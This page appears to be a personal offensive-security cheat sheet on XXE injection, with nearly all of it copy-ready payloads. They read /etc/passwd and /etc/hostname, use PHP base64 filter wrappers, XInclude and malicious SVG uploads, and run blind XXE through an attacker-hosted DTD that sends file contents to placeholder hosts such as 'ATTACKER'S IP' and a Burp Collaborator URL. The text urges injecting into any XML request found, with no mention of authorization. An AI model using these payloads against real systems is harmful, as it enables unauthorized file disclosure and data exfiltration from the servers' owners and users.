XXE Attacks

PRACTICE ! PRACTICE ! PRACTICE !

Found any request handling any kind of XML document, don't hesitate to inject :

<!DOCTYPE d0p [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]>

Don't forget to change the respective element to &xxe;

PHP Wrappers : 

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>

Don't forget to change the respective element to &xxe;

Try to get an out-of-band network connection : 

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR"> ]>

Not allowed to define an Entity or Doctype then : 

<d0p xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></d0p>

XXE via File Upload : 

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY [xxe](https://portswigger.net/web-security/xxe) SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

Name the file with a .svg and modify the Content-Type to image/svg+xml or text/xml

Blind XXE

Blind XXE to detect out-of-band network interaction

<!DOCTYPE d0p [ <!ENTITY % xxe SYSTEM "http://ATTACKER'S IP"> %xxe; ]>

Exploiting Blind XXE

In-order to perform this, we'll have to have an exploit server containing our malicious dtd XML document 

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLAB/exploit.dtd'>">
%eval;
%exfil;

And now we can copy down our exploit server's URL and use it in our usual payload, keep an eye on the in-band request containing the hostname, Always use /etc/hostname instead of /etc/passwd.

<!DOCTYPE stockCheck [ <!ENTITY % xxe SYSTEM "https://THE-MALICIOUS-DTD-URL/exploit.dtd"> %xxe; ]>

Blind XXE to retrieve data by triggering errors

Store this XML payload in the exploit server

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

Now the usual way to get a network interaction

<!DOCTYPE d0p [ <!ENTITY % xxe SYSTEM "http://YOUR-EXPLOIT-DTD"> %xxe;]>

Blind XXE by defining local DTD

Use this payload, when your target is a Linux Sys

<!DOCTYPE stockCheck [ 
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> 
<!ENTITY % ISOamso ' 
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd"> 

<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>"> 

&#x25;eval; 
&#x25;error; 
'> 
%local_dtd; 
]>
PreviousSSRFNextSQL Injection

Last updated